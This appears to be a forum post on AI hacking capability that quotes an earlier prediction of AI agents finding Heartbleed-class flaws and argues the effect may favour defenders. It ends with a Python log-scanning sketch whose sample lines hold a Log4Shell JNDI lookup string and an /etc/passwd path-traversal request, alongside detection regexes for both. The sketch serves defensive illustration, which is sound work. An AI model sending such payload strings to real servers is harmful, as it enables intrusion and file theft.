Regarding Claude Mythos/Project Glasswing:
For what it’s worth, this is in line with my expectations for what LLMs should be capable of and it doesn’t update me much towards their AGI-completeness. (Though it’s at the more bullish end of past!me’s predictions.) Receipts-wise, I’m not sure I laid it out publicly anywhere, but here’s an excerpt from a message I’d sent to @habryka in January 2025:
[T]he worse end of the scenarios I’m imagining is...
The o-series of models potentially doesn’t scale to superhuman programmers-in-general, but does scale to superhuman hackers: because “find a way to make this abstraction leak” is precisely the kind of programming task that is well-posed/isomorphic to a rigorous-math task (“find a flaw in this proof/this statement of tautology”).
I expect that ~all of the components of the current web stack contain countless vulnerabilities that are relatively easy to discover, and which aren’t exploited simply because finding them would require a talented programmer to parse vast mountains of code (application code, and the code of its dependencies, and the dependencies of dependencies, and any cross-interactions between them...).
AI agents of the above type would remove this friction cost.
So if this scenario comes to pass, I expect them to be discovering Heartbleeds and Log4Shells on a daily or weekly basis. Then, at any given time, they would be using that to simultaneously attack large random subsets of the entirety of the Internet infrastructure.
I do, however, still find myself unpleasantly surprised by this. I wouldn’t say it happened “earlier than I hoped”, inasmuch as I did not have specific predictions about the timing… But, well, any time for it to happen would be unpleasantly early, I suppose.
This may ultimately be an edge for defense, not offense. The status quo is that anyone with enough resources and enough programmers to throw at the task could already get an exploit for whatever they wanted.
If the ‘most capable hacker on earth’ is an open model, it means that you will be able to reverse-engineer your own equipment, build better rules for detection, and actually do analysis of low-level logs that would normally be too time-consuming, while attackers would have no confidence that their exploits stay secret.
Compsci theory (weird machines) tells us that exploits exist in any sufficiently complicated codebase.
Targets who are too lazy to adopt technical measures like these are likely wide open today, so the increased vulnerability is irrelevant.
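To make “better rules for detection” and “analysis of low-level logs” a bit more concrete, here is a minimal sketch of what such a rule could look like. Everything in it is an assumption for illustration: the rule names, the two patterns, and the sample log lines are hypothetical, and a real rule set would be far broader and tuned to the actual log format. The first pattern matches the `${jndi:` lookup string associated with Log4Shell attempts; the second matches simple path traversal.

```python
import re
from collections import Counter

# Hypothetical rule set: names and patterns are illustrative,
# not a vetted signature list.
RULES = {
    "jndi_lookup": re.compile(r"\$\{jndi:", re.IGNORECASE),
    "path_traversal": re.compile(r"\.\./|%2e%2e%2f", re.IGNORECASE),
}


def scan(lines):
    """Return (line_number, rule_name) for every rule that matches a log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.append((number, name))
    return hits


def summarize(hits):
    """Count how many log lines triggered each rule."""
    return Counter(name for _, name in hits)


# Made-up access-log lines (documentation-range IPs, reserved .invalid host).
SAMPLE_LOG = [
    '203.0.113.7 "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 "GET /?q=${jndi:ldap://example.invalid/a} HTTP/1.1" 200 "curl"',
    '203.0.113.9 "GET /static/../../etc/passwd HTTP/1.1" 404 "curl"',
]

if __name__ == "__main__":
    for number, name in scan(SAMPLE_LOG):
        print(f"line {number}: {name}")
```

Writing a matcher like this was never the hard part. The point is that a capable model could plausibly draft, test, and keep updating many such rules against logs nobody currently has time to read.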